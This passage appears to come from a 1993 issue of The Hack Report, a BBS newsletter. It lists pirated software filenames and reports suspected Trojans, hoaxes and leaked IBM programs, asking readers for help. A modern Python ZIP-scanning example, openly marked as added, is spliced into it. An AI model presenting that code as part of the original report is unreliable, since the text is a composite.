  ArcMaster (registered)  AM91REG             HW Scott Raymond
                          AM92REG

  Arctic Fox (game, by    AFOX                from the Meier/Morlan List,
   Electronic Arts)                            conf. by HW Emanuel Levy
                                               and Brendt Hess (1:105/362)

  ARJ Archiver            ARJ239RG            HW Scott Raymond
   (registered)           AJ241ECR

  Arkanoid II: Revenge    ARKNOID             James Crawford (1:202/1809)
   of DoH (game)

  Atomix (game)           ATOMIX_             HW Matt Kracht

  A-Train by Maxis        ATRAIN1  through    Chris Blackwell of Maxis
                          ATRAIN6, also        (zoinks@netcom.com)
                          A-TRAIN1 through
                          A-TRAIN6

  BannerMania             BANMANIA            Harold Stein (1:107/236)

  Battle Chess            CHESS               Ron Mahan (1:123/61)
|                         BTLCHESS            Michael Wagoner (1:105/331)

  BeetleJuice (game)      BEETLE              Mark Harris (1:121/99)
                          BETLEJUC            Jason Robertson (1:250/802.2)
                          BJUICE              Alan Hess (1:261/1000)
                          BJ                  Bill Blakely
                                               (RIME Shareware echo)
                          BTLJWC              the Hack Squad
                                               (1:124/4007)

  Big Bird (game?)        BIGBIRD             Cindy McVey, via Harold Stein

  Budokan: the Martial    BUDOKAN             Michael Gibbs (Intelec, via
   Spirit (game)                               HW Bill Lambdin)

  Caveman Ninja           CAVEMAN             Dave Lartique (1:3800/22),
                                               ver. by HW Emanuel Levy

  Check-It PC             CHECKIT             HW Bert Bredewoud
   Diagnostic Software    CHKIT20             HW Bill Lambdin

  Cisco Heat (game)       CISCO               Jason Robertson

  Commander Keen Pt. 5    _1KEEN5             Scott Wunsch (1:140/23.1701)
                          KEEN5E              Carson Hanrahan (CompuServe,
                                               71554,2652)

  {COMMO} v5.4            COMO54X             Allan Bowhill (1:343/555)

  CompuShow GIF Viewer    CSHW860B            HW Scott Raymond

  Copy II PC              COPYPC70            Ryan Park (1:283/420)

  Cyber Chess             C-CHESS             Shane Paul, RIME, via HW
                                               Richard Steiner

  Darkside (game)         DARKSIDE            Ralph Busch (1:153/9)

  Disk Copy Fast 4.0      DCF4UNT             HW Scott Raymond
|  (registered)           DCF41AR

  DiskDupe Pro v4.03      DD403PRO            Jan Koopmans (2:512/163)

  Energizer Bunny Screen  ENERGIZR            Kurt Jacobson, PC Dynamics,
   Saver for Windows                           Inc., via HW Bill Dennison

  F-Prot Professional     FP206SF             Mikko Hypponen
                                               (mikko.hypponen@compart.fi)

  Family Feud (game)      FAM-FEUD            Harold Stein

  FAST! Disk Cache        FAST_1V4            Ryan Park (1:283/420), via
   v4.03.08                                    HW Bill Lambdin

| FaxTalk (Thought        FAXTALK             Lyle Taylor (1:293/644),
|  Communications)                             via Steve Fuqua

| FaxPlus (Thought        FAXPLUS             Lyle Taylor (1:293/644),
|  Communications)                             via Steve Fuqua

  FaxPower                FAXPWR              Carson Hanrahan (CompuServe,
                                               71544,2652)

| Freddy Pharkas,         FREDDY-1            HW Bob Seaborn
|  Frontier Pharmacist    FREDDY-2
|                         FREDDY-3
|                         FREDDY-4
|                         FREDDY-5
|                         FREDDY-6

  GEcho Mail Tosser       GE_1000K            HW Scott Raymond
                          GE_100CK

  GifLite 2.0 (regist.)   GL2-ECR             HW Scott Raymond

  Gods (game)             GODS                Ron Woods (1:134/144)

  Golden Axe (game)       GOLDAXE             Harold Stein

  GSZ Protocol Driver     GSZ0503R            HW Scott Raymond
   (registered)           GSZ0529R

  Home Lawyer             HOMELAWY            Kim Miller (1:103/700)
                          HMLAWYER            Harvey Woien (1:102/752)

| Hoyle's Classic Games   HOYLECL1            HW Bob Seaborn
|                         HOYLECL2
|                         HOYLECL3
|                         HOYLECL4

  HS/Link Protocol        HS121R              Don Becker (Internet,
   v1.21 (registered)                          grendel@jaflrn.linet.org)
                          HS121REG            HW Scott Raymond

  HyperWare Speedkit      SPKT460R            HW Scott Raymond
   v4.60 (registered)

  Ian Bothams Cricket     IBCTDT              Vince Sorensen (1:140/121)

  Intelcom Modem Test     TESTCOM             from the Meier/Morlan List,
   Utility (dist. with                         confirmed by Onno Tesink
   Intel modems)                               (RIME, via HW Richard
                                               Steiner)
|                         INTELCOM            HW Jason Robertson

| Intermail Mailer        IM221U              HW Scott Raymond
|  (registered)           IM22FIX

  Jetsons (game)          JETSONS             Kevin Brott (Internet,
                                        dp03%ccccs.uucp@pdxgate.cs.pdx.edu)

  Jill of the Jungle      JILL2               Harold Stein
   (non-shareware files)  JILL3
                          $JILL2              HW Bert Bredewoud
                          $JILL3

  Killing Cloud (game)    CLOUD               Mike Wenthold

  Kings of the Beach      VBALL               Jason Robertson
   (game)

  Landmark System         SPEED330            Larry Dingethal (1:273/242)
   Speed Test             SPEED600            Joe Morlan (1:125/28)

  Life & Death (game)     L&D1                Harold Stein
                          L&D2

  List Enhanced           LIST8               Richard Dale (1:280/333)
                          LISTE18D            HW Scott Raymond

  MegaMan (game)          MEGAMAN             HW Emanuel Levy

  Microsoft Flight        FS                  Michael Gibbs (Intelec, via
   Simulator                                   HW Bill Lambdin)
|                         FS50TDT1            HW Bob Seaborn
|                         FS50TDT2

| Microsoft Mouse Driver  MOUSE901            Alex Morelli (CompuServe,
|                                               75050,2130)

  Microsoft Ramdrive      RAMDRIVE            Barry Martin (Intelec, via
                                                HW Bill Lambdin)

  MS-DOS 6.0              MSDOS6-1            Harold Stein
                          MSDOS6-2
                          MSDOS6-3

  Oh No, More Lemmings    ONMLEMM             Larry Dingethal (1:273/231)
   (complete-not demo)

  Over the Net            OTNINC1             Tim Sitzler (1:206/2708)
   (volleyball game)

  PGA Tour Golf           GOLF                HW Bill Lambdin

  PKLite (registered)     PKL15REG            HW Scott Raymond

  PKZip v2.04c            PK204REG            HW Scott Raymond
   (Registered)

  PKZip v2.04c            PKZCFG              Mark Mistretta (1:102/1314)
   Configuration Editor

  PKZip v2.04e            PK204ERG            HW Scott Raymond
   (Registered)

  PKZip v2.04g            PKZ204R             HW Bill Dennison
   (Registered)           PKZ204GR            HW Jason Robertson

  Populous (game)         POPULOUS            Harold Stein

  The Price is Right      PRICE               Harold Stein
   (game)

  Prince of Persia        PRINCE              Kenneth Darling (2:231/98.67)
                                              Eric Alexander (1:3613/10)
                                              HW Emanuel Levy
                          PRINCE2A            Todd Crawford (1:3616/40),
                          PRINCE2B            via HW Jeff White
                          PRINCE2C

  PrintShop               PSHOP               Michael Gibbs, Intelec, via
                                               HW Bill Lambdin

  Psion Chess             3D-CHESS            Matt Farrenkopf (1:105/376)

  Pyro! PC                DOSPYRO             Jay Kendall (1:141/338), via
   (Fifth Generation)                          HW Scott Raymond

  Q387 (registered)       Q387UTG             Michael Toth (1:115/439.7)

  QModem Pro              QMPRO-1             Mark Mistretta
                          QMPRO-2

  QuickLink II Fax v2.0.2 QLINK1              Carson Hanrahan (CompuServe,
                          QLINK2               71554,2652)

  Rack 'Em (game)         RACKEM              Ruth Lee (1:106/5352)

  Rawcopy PC              RAWCOPY             HW Chris Wise

  Sequencer Plus Pro      SPPRO               Tom Dunavold (Intelec,
                                               via Larry Dingethal)

  Shadow Warriors (game)  SHADOWG             Mark Mistretta

  Sharky's 3D Pool        POOL                Jason Robertson (1:250/801)

  Shez (Registered)       SHEZ84R             Eric Vanebrick (2:291/712)
                          SHEZ85R             HW Scott Raymond
                          SHEZ87R
                          SHEZ88R
                          SHEZ89R
|                         SHEZ91R

  SideKick 2.0            SK3                 Harold Stein

  SimCity (by Maxis)*     SIMCITY1            Peter Kirn, WildNet Shareware
                          SIMCITY2             conf., via HW Ken Whiton
                          SIMCITY3
                          SIM_CITY            Kevin Brott (Internet,
                                        dp03%ccccs.uucp@pdxgate.cs.pdx.edu)
                          SIMCTYSW            Scott Wunsch

  Smartdrive Disk Cache   SMARTDRV            Barry Martin (Intelec, via
                                                HW Bill Lambdin)
                          SMTDRV40            Michael Toth (1:115/220)

  Spidey (game)           SPIDEY              Brian Henry (ILink,
                                               via HW Richard Steiner)
                          SPIDRMAN            Alan Hess (address unknown)

  Squish 2.1              SQUISH              Jason Robertson (1:250/802.2)
   (Sundog Software)      SQUISH21            Several (ver. by Joe Morlan)

  Star Control Vol. 4     STARCON             Carson M. Hanrahan
                                               (CompuServe 71554,2652)

  Streets on a Disk       STREETS             Harvey Woien

| SuperZModem             SZMO200             HW Jason Robertson
|  (registered)

  Teledisk (files         TDISK214            Mark Mistretta
   dated after Apr. 1991)
                          TELE214R            Staale Fagerland (Internet,
                                             staale.fagerland@euronetis.no)

  Telemate                TM411REG            HW Scott Raymond

  TheDraw v4.61 (reg.)    TDRW461R            HW Scott Raymond

  Vegas Casino 2 (game)   VEGAS2              The Hack Squad

  VOpt Disk Defragmenter  VOPT30              The Hack Squad

  VPic v6.0 (registered)  VPIC60CR            HW Scott Raymond

  Wheel of Fortune        WHEEL               Harold Stein

  Where in the USA is     CARMEN              Carson Hanrahan
   Carmen Sandiego?       CARMENUS            Cindy McVey, via Harold Stein

  Where in Time is        CARMENT             Cindy McVey, via Harold Stein
   Carmen Sandiego?

  WinWay Resume for       WINRES              Erez Carmel (CompuServe,
   Windows                                      70523,2574)

  World Class Rugby       WCRFNTDT            Vince Sorensen

  ZipMaster (registered)  ZM31REG             HW Scott Raymond

  * - Peter Kirn's report on SimCity indicated that Maxis has in fact
  released a demo of SimCity onto ZiffNet which limits play to 5 minutes.
  This is not the same file as he reported, however - the ones he found are
  indeed pirate copies.

  =========================================================================

                      ?????Questionable Programs?????

  This section of The Hack Report is for the "misfits" - in other words,
  files that are hacks, hoaxes, Trojans, or pirated, but either do not
  quite fit into one of the main sections of the report or require more
  explanation than the format of the appropriate section allows.  The extra
  material presented here is usually included for a good reason, so please
  take the time to read at least the new entries quite carefully.  Also, if
  you have any input on any of the listed files, do not hesitate to send it
  in to your Hack Squad.

  Quite a few folks questioned a release of Vern Buerg's LIST calling
  itself v7.8a.  This one actually came down one of the file distribution
  networks, if memory serves.  However, in response to these inquiries,
  your Hack Squad called up The Motherboard BBS, Mr. Buerg's home system.
  On that system was posted the following bulletin:

        ================================
    ===  July 15:  LIST78A.ZIP is bogus  ===============================
        ================================

    A beta test version of LIST 7.8a was uploaded to other systems by
    mistake. It is not an official version, and it has bugs, e.g. the
    mouse doesn't work.

    A new version will be released next week. Those waiting for
    registered copies will be sent theirs first, then it will be posted
    on VOR and CIS. The manual was dramatically updated and is now 54
    pages with full color cover. We'll have some on the shelves at the
    store next week.

  So, this definitely qualifies as a "misfit" - it isn't a hack, hoax, or
  Trojan - it's an accident.

  Robert Jung's ARJ archiver has had a new release in non-beta form.  The
  legitimate file can be identified by an ARJ-SECURED envelope.  However,
  making equally big news (unfortunately) were several sightings of pirated
  versions of the registered v2.41 file.  These were most often seen as a
  ZIP file (?) with the following internal files:

     Length  Method   Size  Ratio   Date    Time    CRC-32  Name
     ------  ------   ----- -----   ----    ----   -------- ----
       1436  DeflatX    614  58%  06-09-93  16:05  23af995c README
     223594  DeflatX 222850   1%  06-04-93  09:19  fe351d41 ARJ241.EXE
     127882  Stored  127882   0%  06-04-93  09:27  54fdf489 ARJUTIL.ARJ
      55301  DeflatX  54641   2%  06-04-93  09:18  6d4e75fe UNARJ241.EXE
     244816  Stored  244816   0%  06-10-93  09:23  0abdb4be ARJHLP24.ARJ
     ------          ------  ---                            -------
     653029          650803   1%                                  5

  The giveaway here is the ARJUTIL.ARJ file - this contains programs that
  are only available to registered users.

  This causes a problem as far as listing this in the .col/.idx files is
  concerned:  the person who distributed the pirated version used the same
  filename as the real thing.  The only way you're going to be able to tell
  the pirated version from the legitimate one will be to look inside your
  copy of the archive.  If you see either the ARJUTIL.ARJ file inside, or
  the files ARJR.EXE or DEARJ.EXE, then you have the pirated copy.  Please
  delete it.  (Note - version 2.41 has been superseded - please see the
  Hacked Files section of this report for the latest version as of this
  writing.)
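
  The "look inside your copy" check described above, as an added example
  that is not part of the original report: it reads the member names of a
  ZIP-wrapped copy (the form the report says was most often seen) and of any
  ZIP nested inside it, without running anything.  The helper names, the
  depth and size limits, and the sample archives are assumptions constructed
  for the example; ARJ containers are not opened.

```python
import io
import zipfile

# File names the report gives as the sign of the pirated registered copy.
TELLTALE_NAMES = {"ARJUTIL.ARJ", "ARJR.EXE", "DEARJ.EXE"}
MAX_DEPTH = 3                        # assumed limit on ZIP-inside-ZIP nesting
MAX_NESTED_BYTES = 16 * 1024 * 1024  # assumed cap on a nested archive's size
ZIP_MAGIC = b"PK\x03\x04"


def base_name(member_name):
    """Upper-cased file name without any directory part (either slash style)."""
    return member_name.replace("\\", "/").rsplit("/", 1)[-1].upper()


def read_nested_zip(archive, info):
    """Return the member's bytes if it is itself a ZIP within the cap, else None."""
    if info.flag_bits & 0x1:          # encrypted member: contents not readable
        return None
    try:
        with archive.open(info) as member:
            if member.read(4) != ZIP_MAGIC:
                return None
            rest = member.read(MAX_NESTED_BYTES)
    except (NotImplementedError, zipfile.BadZipFile):
        return None
    if len(rest) >= MAX_NESTED_BYTES:  # too large to unpack safely
        return None
    return ZIP_MAGIC + rest


def find_telltales(zip_bytes, prefix="", depth=0):
    """Return sorted member paths whose file name is one of TELLTALE_NAMES."""
    found = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            path = prefix + info.filename
            if base_name(info.filename) in TELLTALE_NAMES:
                found.append(path)
            if depth < MAX_DEPTH:
                nested = read_nested_zip(archive, info)
                if nested is not None:
                    try:
                        found.extend(
                            find_telltales(nested, path + "!", depth + 1))
                    except zipfile.BadZipFile:
                        pass          # looked like a ZIP but is damaged
    return sorted(found)


def build_zip(members):
    """Build an in-memory ZIP from {name: bytes}; used for constructed samples."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w", zipfile.ZIP_STORED) as archive:
        for name, data in members.items():
            archive.writestr(name, data)
    return buffer.getvalue()


if __name__ == "__main__":
    # Constructed samples: member names follow the listing in the report,
    # the contents are placeholder bytes.
    flagged = build_zip({"README": b"text", "ARJ241.EXE": b"MZ",
                         "ARJUTIL.ARJ": b"\x60\xea"})
    inner = build_zip({"util/dearj.exe": b"MZ"})
    wrapped = build_zip({"readme.txt": b"text", "inner.zip": inner})
    print(find_telltales(flagged))
    print(find_telltales(wrapped))
```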

  Dotti Rosier (1:114/107) found a message on a local BBS system that might
  be worth reading.  The text read as follows:

       WARNING: Nobody download PHACS1.EXE and NETWORK1.EXE..They have
       the Yankee Doodle virus that is only detectable by SCANV99....
       please clean these two exe files IMMEDIATELY and in case you
       have run them already, there might be some other files that are
       infected. CLEAN99 will clean them just fine. Sorry for the
       inconvenience but I recently found out that my HD was infected
       and therefore, every file that I compile is infected. Thank you
       for your patience.

  I can only assume that these were self extracting archives - no
  descriptions of the files were available.

  Steve Winter (1:153/7070) reported on a file called SUB1_V21.  This
  claimed to be a program called SUB, a directory list utility.  Steve
  checked out the file prior to running the install program and found no
  anomalies.  However, once installed, he says he began to get conflicting
  directory reads, disk full errors, and problems booting.  Somehow, his
  boot record had been damaged.

  According to his testing, the file passes scans with F-Prot v2.08a and
  does not alert McAfee's VShield v104.  He says the archive contains two
  files - INSTALL.EXE and SUB.SPZ, which contains the executable.  INSTALL
  creates a subdirectory and extracts files from the SUB.SPZ file.

  Steve says he is attempting to get another copy for testing.  Until that
  time, I can't say for sure if he was the victim of a system glitch, buggy
  software, or a true Trojan.  If anyone out there has this file, please
  contact your local HackWatcher or myself so that we can arrange for
  testing.

  Mark Harris (1:121/26.1) found a pair of archives called DEATH_1 and
  DEATH_2 on a local system.  The files were described as a new Apogee game
  called Deathbringer.  The archives contained no documentation, and all
  program files were dated 1990 or 1991.  When run, the game displayed the
  name "Deathbringer," but gave no company or copyright information.  Scans
  by McAfee's ViruScan and Frisk's F-Prot proved negative.

  Mark has provided additional information that adds to the suspicion that
  this is a pirated file.  The program begins with the following screen:

         Empire, in association with ODE and The Mystery Machine,
                                 presents
                         -=*=- DEATHBRINGER -=*=-
                            Select Vidoe Mode:

                            1)  VGA   16 color
                            2)  EGA   16 color
                            3) Tandy   4 color
                            4)  CGA    4 color
                            5) Tandy  16 color

       Roland, Adlib and Tandy music supported
       (Playing now, if found, M to toggle on/off)
       J to select Joystick, K for keyboard
       = to speed up, - to slow down game (fast PCs)

       THOSE WHO LABOURED:
       John Wood...................Atari ST, Commodore Amiga, Design
       Kevin Ayre.....................................IBM PC, Design
       Colin Swinbourne.....................................Graphics
       Richard Yapp...................................Levels, Design
       Sound Images............................................Music

       Deathbringer,  Karn  and  all  Deathbringer  Characters  and  the
       distinctive  likenesses thereof are Trademarks of Abaddon Duke of
       Hell Group Inc.

  Mark goes on to say:

       There was no documentation in the archive (which I will
       continue to hold on to, in case you need it for any reason)
       giving any playing instructions, no shareware notice or
       registration request, nothing whatsoever to indicate the origin
       of this program except for the above.  That's what prompted me
       to write in the first place; it looks to me (especially
       considering the quality of the graphics,) like this is a
       commercial program with as much of the copyright and
       identifying screens hacked out of it as possible.

  As an Apogee Tech Support Specialist, I can personally verify that this
  is not a product of Apogee.  Mark's opinion is that this is a hack of a
  commercial game:  I tend to agree.  Jim Wells (1:2613/261) forwarded the
  file contents, along with some other information still being looked into:
  he feels that this is a "hacked" version of the official release, whether
  shareware or commercial.  Rick McBride (1:363/178) says it is indeed
  commercial, as he saw it on a CD-ROM about a year ago.  However, he does
  not remember the publisher's name (possibly Psygnosis, he says) - only
  that it is an arcade-style D&D game.

  This is still being researched.  In the meantime, I would appreciate any
  information that a user of the possible commercial version could forward
  - please help your Hack Squad verify this one.

  Chuck Cypert (1:124/2113) reported in the FidoNet VIRUS_INFO echo that
  the SysOp of the CompUSA BBS in Carrollton, TX had a problem with a file
  called UNIXHAC.  The SysOp reports that this file formatted his hard
  drive.  No further details were available, as the SysOp had already
  deleted the file.  If someone has a copy of this, again, please contact
  one of The HackWatchers or myself.

| Harvey Woien (1:102/752) forwarded a report from a user of The
| Motherboard (Vern Buerg's BBS), Ted R. Marcus, about a version of the
| Microsoft Mouse Driver claiming to be version 9.0.  It also appears that
| this file came down a file distribution network under the filename
| MSMAUS90, possibly originating in Germany.  Your Hack Squad has found a
| copy of the same archive Ted reported on, and confirms some of his
| observations on the file (MOUSE900), quoted here:
|
| 1.  Microsoft Diagnostics and InfoPlus report this "9.00" driver as
|     version 8.00.  The latest "official" version of which I am aware is
|     8.20a.
|
| 2.  The "new" driver is significantly smaller than version 8.20a.
|
| 3.  The "new" driver supports the undocumented /U switch (which loads
|     much of the driver into the HMA).  Version 8.0 and 8.1 supported this
|     feature, but Microsoft removed it from version 8.2 (shipped with DOS
|     6.0).  The support for the /U switch suggests that the driver is, in
|     fact, version 8.0.
|
| 4.  Examining the MOUSE.COM driver file reveals one instance where the
|     version number (repeated in the initialization message for each
|     language the driver supports) is "9.40".  That indicates either
|     uncharacteristic sloppiness on the part of Microsoft -- or, more
|     likely, sloppiness on the part of a hacker.
|
| More information on MOUSE900 comes from Jeffery Bradley (1:3635/35).  He
| informed the folks here at Hack Central Station that there is indeed a
| legitimate v9.0 of the Microsoft Mouse Driver.  However, after talking
| with Microsoft, he did confirm that this should not be distributed via
| BBS systems:  it is commercial only, as previously reported.

  Yet another file that doesn't fit into any of the report categories: a
  report from Wen-Chung Wu (1:102/342) concerns the archive PKLT120R, which
  claims to be version 1.20 of PKLite.  This is actually PKLite
  Professional v1.12, a commercial product, which has been hacked to show
  version 1.20 instead of 1.12.  To make matters worse, the PKLITE.EXE file
  was compressed "by PKLITE itself more than three times and once by
  LZEXE."  So, what we have here is a hack of a pirated commercial file -
  jeez, this job gets confusing at times. ;-)

  Here's an update on the report from Bud Webster (1:264/165.7) on the
  Apogee game being distributed under the filename BLOCK5.ZIP.  As reported
  by Matthew Waldron (RIME Shareware Conf., via HW Richard Steiner) and Dan
  Stratton (via HW Ken Whiton), this program was part of an Apogee disk
  called the "Super Game Pack," and is a game called "Block Five."
  Joe Siegler (1:124/9006), the online support representative for Apogee
  Software Productions, confirms this, and states that the majority of the
  games on this disk, including this one, have been officially
  discontinued.  The official company stand is that this game should not be
  distributed via BBS systems, as it is no longer supported in any way by
  Apogee Software Productions.  Thanks to everyone who helped on this one.

  HW Bill Lambdin says he found a file in the Knoxville, Tennessee area
  called BIBLEPR (no description available) that appears a bit suspicious.
  The file contents are:

                Length  Time    CRC-32  Attr  Name
                ------  ----   -------- ----  ----
                 34176  11:26  d267f5de --w-  BIBLEPR.COM
                158493  00:04  4298ac2d --w-  DATAPR-0.DAT
                158493  00:04  d87adf4b --w-  DATAPR-1.DAT
                158493  00:08  1213c6b3 --w-  DATAPR-2.DAT
                159764  00:08  38d7cc06 --w-  DATAPR-3.DAT
                  1572  24:05  3a60c80e --w-  BIBLEPR.DOC
                ------                        -------
                670991                              6

  When BIBLEPR.COM executes, Bill says it displays the following message:

                        Greets from DOA!

        Don't say I didn't warn you! You are also busted!

        Expect a visit from the SPA!

        Omni, I will avenge you!

  Bill's disassembly shows the file contains two INT 26 calls, which are
  DOS Absolute Disk Write instructions.  He said that if it contains a
  virus, he was unable to get it to replicate.  A copy of the archive has
  been sent to Glenn Jordan at Datawatch Software for testing.

  Here's an interesting point, brought to my attention by HW Richard
  Steiner and John Weiss of the RIME Shareware Conference.  In previous
  issues, I have listed two files, QM60IST1 and QM60IST2 (reported by
  Francois Thunus, 2:270/25), as pirated copies of QModem v6.0.  However,
  Richard and John quite correctly point out that there was no release of
  QModem v6.0 - the program changed to QModem Pro after v5.

| This file, or a variant, has also been spotted by Jerry Van Laer of
| 2:292/805.7, under the name QM60D1-2 and QM60D2-2.  In this case, an
| internal "brag" screen stated the program was QmodemPro 1.0.

  From what Francois reported, I believe that what he saw was indeed Qmodem
  Pro, now a commercial-only program.  However, it was "released" under the
  above filenames.  So, is it a Hack?  Pirated File?  Or what?  Doesn't
  matter - it shouldn't be distributed.  Thanks, Richard and John, for
  making me fully engage my brain for a change. <grin>

  HW Bill Dennison captured a message from Marshall Dudley (Data World BBS,
  (615)966-3574) in the ILink VIRUS FILE conference about the archive
  ASCDEMO.  Marshall says that McAfee's ViruScan doesn't detect any
  infection until after you run it and it has infected other files.  No
  further information was supplied, other than the internal filenames
  (ASCDEMO.DOC and ASCDEMO.EXE).  I need further data on this before I can
  list it in the Trojan Wars section, so please advise if you have any.

  HW Emanuel Levy says the file IM, reported by Michael Santos in the
  Intelec Net Chat conference and listed in the 1992 Full Archive edition
  of The Hack Report.  Michael's report was a "hearsay" report from one of
  his friends, and stated that the IM screen saver file caused a viral
  infection.

  Emanuel says the file is an "outer space screen saver," currently under
  the filename IM17.  Scott Wunsch (1:140/23.1701) says the program name is
  "Inner Mission," and he currently has version 1.6.  In both cases, the
  files were clean.

  So, it looks like either Michael's friend's system became infected from a
  different source than the IM file, or that an isolated incident of an
  infected IM is involved.  No way to tell at this writing.

  Long time readers of this report will remember a question concerning the
  status of a screen saver called TUNNEL.  Ove Lorentzon (2:203/403.6) and
  Bill Roark (RIME address BOREALIS, Shareware conference, via HW Richard
  Steiner) both stated that the program was an internal IBM test program
  and was not intended for outside distribution.

  Your Hack Squad has received word from the author of the program, Dan
  Butterfield (Internet, danielb@vnet.ibm.com), that as far as he is aware,
  the program has never been released to the general public.  According to
  Dan, "it is still owned by IBM, and as such has been given the IBM
  security classification 'IBM Internal Use Only' which means what it says:
  the program is not for distribution to non-IBM employees."

  Dan also says that several other "Internal Use Only" programs have been
  "leaked" to the outside world, which implies that these files should not
  be posted for download.  One such program was originally called Dazzle
  (NOT to be confused with the other popular DAZZLE screensaver), but has
  entered BBS distribution under the filename O-MY-GOD (also seen as OMG,
  per Michael Burkhart (RIME address CENTER, via HW Richard Steiner)).
  However, note that the O-MY-GOD/OMG file was hacked, according to Dan, so
  that all of the "Internal Use Only" references were removed.

  Another is a program that is usually included inside other archives:  the
  program name is PLAYANI.  Dan says this has been distributed "along with
  various animations," and also falls under the same Internal
  classification.

  A prime example of this is an archive called BALLS (not what you think).
  This is an animation of multiple chrome spheres rotating around each
  other above a red and white checkerboard platform.  In this case, both
  the player (PLAYANI) _and_ the animation are the property of IBM and are
  not intended for BBS distribution.

  Again, to quote Dan, "None of these programs are for external
  distribution; all are owned by IBM and are only for use inside IBM by IBM
  employees."  Thanks to Dan for all of his help.

  Donn Bly has cleared up the question on the status of the Sydex program
  TeleDisk, first raised by Mark Draconis (1:120/324) and Kelvin Lawson.
  Donn was kind enough to mail a copy of a letter sent to him by Sydex
  explaining that TeleDisk is no longer shareware.  Here is an excerpt from
  the letter:

       "Effective April 1991, TeleDisk is no longer a shareware
       product.  After long consideration, we decided to
       discontinue our offering of the shareware edition of
       TeleDisk, and license it only as a commercial product.

       "Commercial licenses of TeleDisk are available from Sydex at
       $150 a copy.  All shareware distributors and BBS sysops who
       take time to check their sources are requested to remove
       TeleDisk from shareware distribution."

  The letter is signed by Miriam St. Clair for Sydex.  To summarize, Sydex
  is no longer accepting shareware registrations for TeleDisk, and asks
  that it not be made available for download from BBS systems.

  Thanks to Donn for his help in this matter.

  HW Ken Whiton forwards messages from Harold Stein, Gary Rambo, and Gwen
  Barnes of Mustang Software, Inc., about a "patch" program aimed at
  OffLine Xpress (OLX) v1.0.  The patch is supposed to allow OLX to
  read and reply to Blue Wave packets, along with a lot of other seemingly
  unbelievable feats.  Gwen Barnes did not seem to know of the patch, but
  published the following advice in the WildNet SLMROLX conference to
  anyone considering trying it:

    1. Make a complete backup of your system.
    2. Make sure you've got all the latest SCAN stuff from McAfee
    3. Try it, keeping in mind that it more than likely does nothing
       at all, or is a trojan that will hose your system.
    4. Get ready to re-format and restore from backups if this is in
       fact the case.

  No filename was given for this patch.  If anyone runs across a copy of
  it, please contact one of The HackWatchers or myself so that we can
  forward a copy to MSI for testing.

  HW Bill Lambdin reports that someone has taken all of McAfee Associates'
  antiviral programs and combined them into one gigantic (over 700k)
  archive.  He did not say whether the files had been tampered with, but he
  did send a copy to McAfee for them to dissect.  The file was posted under
  the filename MCAFEE99.  I would not suggest downloading this file:  as a
  matter of fact, this reporter prefers to call McAfee's BBS directly when
  a new version of any of their utilities comes out.  I highly recommend
  this method, since it ensures that you will receive an official copy.

  HW Matt Kracht forwarded a message from Stu Turk in the DR_DEBUG
  echo about possible Trojans going around as PKZIP 2.21 and/or 2.22.  Stu
  also says that there is a warning about these in circulation.  If you
  have a copy of this warning, please send a copy to Hack Central Station
  (1:124/4007).

  =========================================================================

                            Information, Please

  This is the section of The Hack Report where your Hack Squad asks for
  _your_ help.  Several reports come in every week, and there aren't enough
  hours in the day (or fingers for the keyboards) to verify them all.  Only
  with help from all of you can The Hack Report stay on top of all of the
  weirdness going on out there in BBSLand.  So, if you have any leads on
  any of the files shown below, please send them in: operators are standing
  by.

| Chuck Hammock (1:392/20) reported in the FidoNet DIRTY_DOZEN echo that
| one of his users uploaded a file called PASTUT24.  The user warned Chuck
| that this file was infected with the Kamikazee virus.  I was unable to
| get further information on this, so Chuck, if you are reading this (or if
| anyone else can confirm this), please send me some NetMail on your
| results.

| Russell Wagner reported a problem with a copy of VMIX222.  This shareware
| multitasker is currently at v2.87.  Russell claims to have found a
| possible isolated incident of a Trojan version of the program.  He wound
| up scrambling the FAT on his C: drive when he ran the program, and was
| able to reproduce the damage in subsequent tests.  He only ran the
| program on one system, however, so it is not clear as to whether he has
| found a true Trojan claiming to be the real VMiX, a corrupted copy of the
| file, or whether he has some sort of hardware incompatibility.  If anyone
| else has run into a problem with v2.22 of this program, please advise.

  Robert Rothenburg (Internet robert.rothenburg@asb.com) received a file
  called JAMMER that he says is very suspicious.  The archive had a file
  with the name JAMMER.EXE and a description that said something to the
  effect of, "run this first and your calls won't be traced."

  He looked through the executable and found the name "Nmodem Jammer 2.8",
  along with "some other claims about adjusting the modem configuration"
  and "some nasty insults to a couple of people."  Virus scanners showed
  nothing, so he looked at the interrupts.  He says it "looks like it
  installs a TSR of sorts and does some disk writes."  He concludes that
  the file possibly "instals a virus or just damages certain files, though
  I suspect it will go after the comm program, as a message says when it
  ends to 'run your communications program now!'".

  I am attempting to get a copy of this from Robert for further testing -
  please be on the lookout for a copy, and notify your local HackWatcher or
  myself if you see it.

  Jim Tinlin (1:206/2604) brought into question a file called CRAPS, which
  looks like a shareware Craps game for Windows.  However, a line inside
  the internal README.TXT file reads as follows:

      "As a licensed owner, please do not distribute this copy to others"

  To further confuse matters, the game displays an opening screen that
  states it is indeed shareware and should be distributed.  The file
  contents are as follows:

        CRAPS    EXE    264007 05-13-93   9:05aC
        CRAPS    HLP     40043 04-12-93   7:16aC
        README   TXT      5322 04-12-93   7:02aR
                5 file(s)     309372 bytes

  This is another one that makes us scratch our heads here at Hack Central
  Station.  Any information would be appreciated.

  HW Bob Seaborn forwarded a message from Kevin Haverstock (via Tom Scott,
  1:140/47) about a file called TCM_V511.  This was described as "The
  Configuration Manager," a system configuration utility.  Kevin's report
  said that once you finish running the setup, your computer reboots and
  you get a prompt that "scrolls your screen and locks up your system."  He
  was unable to access his hard drive after booting from a system disk - a
  reformat was required.

  I am familiar with a legitimate shareware program called The
  Configuration Manager, but not under version number 5.11, nor under the
  above filename.  I can't be sure if Kevin's problems were the result of a
  hardware error, user error, or an isolated incident of a tampered
  archive.  If anyone has any information on what could have caused this,
  please enlighten me.

  Harold Stein (1:107/236) found a file called STETRIS, claiming to be a
  Super Tetris game.  He says that there was a shareware version of this
  that was released about a year ago, but has since been renamed due to a
  conflict with a commercial game of the same name.  He is not sure whether
  or not he found the old shareware file or a pirated copy of the
  commercial file.  The archive (in .zip format, presumably using v2.04g)
  was 55,318 bytes long, and the archive date had been "touched" by the BBS
  it was uploaded to, forcing it to March 23, 1993.  (Editorial: this
  renders filedates rather useless, IMHO. -lj)

  Based on further information from Jeff Hancock (1:3600/7), it seems now
  that Harold may have either an older shareware version, an incomplete
